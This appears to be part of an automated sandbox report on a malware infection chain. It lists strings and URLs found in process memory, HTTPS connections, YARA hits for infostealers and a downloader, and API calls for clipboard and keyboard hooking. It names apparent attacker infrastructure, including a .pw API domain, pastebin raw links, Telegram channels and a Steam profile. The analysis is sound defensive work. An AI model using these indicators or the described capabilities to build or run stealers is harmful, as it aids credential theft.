                      Source: explorer.exe, 00000001.00000000.1691821298.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692386712.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: explorer.exe, 00000001.00000000.1695312230.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                      Source: explorer.exe, 00000001.00000000.1695312230.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                      Source: explorer.exe, 00000001.00000000.1695312230.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                      Source: InstallUtil.exe, 0000002A.00000002.2934147061.0000000004465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                      Source: explorer.exe, 00000001.00000000.1693195889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                      Source: explorer.exe, 00000001.00000000.1693195889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn5.cdn-telegram.org/file/i4QQmSX-IWl_DPP440WbnzRvPCaYFxClaDPOTGTMNvRYQOqwUilTO2gWelNn07kDZ
                      Source: InstallUtil.exe, 0000002A.00000002.2934147061.0000000004465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: InstallUtil.exe, 0000002A.00000002.2934147061.0000000004465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: 4577.exe, 00000018.00000002.2986069883.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                      Source: csrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                      Source: 4577.exe, 00000018.00000002.2986069883.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                      Source: InstallUtil.exe, 0000001A.00000002.2398528056.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.2397253515.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.2398138464.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drownthinsaltroutese.pw/
                      Source: InstallUtil.exe, 0000001A.00000002.2398528056.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drownthinsaltroutese.pw/Bj
                      Source: InstallUtil.exe, 0000001A.00000002.2398528056.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drownthinsaltroutese.pw/Hk
                      Source: InstallUtil.exe, 0000001A.00000002.2398528056.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drownthinsaltroutese.pw/ak
                      Source: InstallUtil.exe, 0000001A.00000002.2395264074.0000000000B12000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.2398138464.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drownthinsaltroutese.pw/api
                      Source: InstallUtil.exe, 0000001A.00000002.2398138464.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drownthinsaltroutese.pw/apiq2
                      Source: InstallUtil.exe, 0000001A.00000002.2398528056.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drownthinsaltroutese.pw/n
                      Source: InstallUtil.exe, 0000001A.00000002.2398138464.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drownthinsaltroutese.pw/nd1
                      Source: InstallUtil.exe, 0000001A.00000002.2398138464.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drownthinsaltroutese.pw/pi
                      Source: InstallUtil.exe, 0000001A.00000002.2398528056.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drownthinsaltroutese.pw/tj
                      Source: InstallUtil.exe, 0000002A.00000002.2934147061.0000000004465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: InstallUtil.exe, 0000002A.00000002.2934147061.0000000004465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: InstallUtil.exe, 0000002A.00000002.2934147061.0000000004465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: explorer.exe, 00000001.00000000.1697168851.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                      Source: svchost.exe, 00000020.00000003.2293790669.0000021A306C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                      Source: svchost.exe, 00000020.00000003.2293790669.0000021A3071A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: svchost.exe, 00000020.00000003.2293790669.0000021A306C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                      Source: svchost.exe, 00000020.00000003.2293790669.0000021A306A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.2293790669.0000021A306E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: svchost.exe, 00000020.00000003.2293790669.0000021A306C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                      Source: E35F.exe, 0000001E.00000000.2271500419.0000000000D32000.00000002.00000001.01000000.00000011.sdmp, InstallUtil.exe, 0000002A.00000002.2767631716.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://github.com/L1ghtM4n/TorProxy/blob/main/LIB/Tor.zip?raw=true
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                      Source: explorer.exe, 00000001.00000000.1693195889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                      Source: svchost.exe, 00000020.00000003.2293790669.0000021A306C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                      Source: svchost.exe, 00000020.00000003.2293790669.0000021A30672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                      Source: explorer.exe, 00000001.00000000.1697168851.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.0000000003464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000033A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/cription
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/z2fzAVz5
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/z2fzAVz5d
                      Source: explorer.exe, 00000001.00000000.1697168851.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                      Source: 2DF.exe, 00000021.00000002.2472767778.0000000002E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199592921038
                      Source: 2DF.exe, 00000021.00000002.2472767778.0000000002E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199592921038hello
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.0000000003464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me
                      Source: 2DF.exe, 00000021.00000002.2472767778.0000000002E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/mcfuture
                      Source: 2DF.exe, 00000021.00000002.2472767778.0000000002E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/mcfuturehnymfsOpera/9.80
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000035B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/tor
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000035B7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000002A.00000002.2865725310.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000002A.00000002.2865725310.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/tor_proxies
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.0000000003464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/tor_proxiesd
                      Source: 4577.exe, 00000018.00000002.2986069883.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000034F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000001.00000000.1697168851.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                      Source: explorer.exe, 00000001.00000000.1697168851.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                      Source: Kinds.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                      Source: InstallUtil.exe, 0000002A.00000002.2934147061.0000000004465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: Kinds.8.drString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: InstallUtil.exe, 0000002A.00000002.2934147061.0000000004465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                      Source: explorer.exe, 00000001.00000000.1693195889.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                      Source: explorer.exe, 00000001.00000000.1693195889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                      Source: explorer.exe, 00000001.00000000.1693195889.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                      Source: 4577.exe, 00000018.00000002.2986069883.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/
                      Source: csrss.exe, 00000026.00000002.2986522634.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/documentation.html
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49738 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.36.38.33:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49746 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49752 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49758 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49759 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49760 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49762 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49764 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49765 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49769 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49770 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.131.114:443 -> 192.168.2.4:49772 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.23.244.244:443 -> 192.168.2.4:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49787 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 134.209.224.96:443 -> 192.168.2.4:49789 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.68.143:443 -> 192.168.2.4:49794 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: Yara matchFile source: 35.2.5390.exe.4c0e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.5390.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.3.5390.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000002.2578542876.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000003.2383099821.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.2578790306.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1708892086.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1708988921.0000000000751000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1984144647.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.2438465954.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.2438798088.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1988409529.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0D1E50 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,21_2_00007FF73D0D1E50
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0040907E SetWindowsHookExW 00000002,Function_0000A013,00000000,000000008_2_0040907E
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0D1E50 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,21_2_00007FF73D0D1E50
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0D1B98 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,21_2_00007FF73D0D1B98
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0B9AF0 GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,21_2_00007FF73D0B9AF0

                      System Summary

                      barindex
                      Source: 30.0.E35F.exe.db8096.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 42.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 30.0.E35F.exe.db8096.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 30.0.E35F.exe.d30000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 49.0.FD8E.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
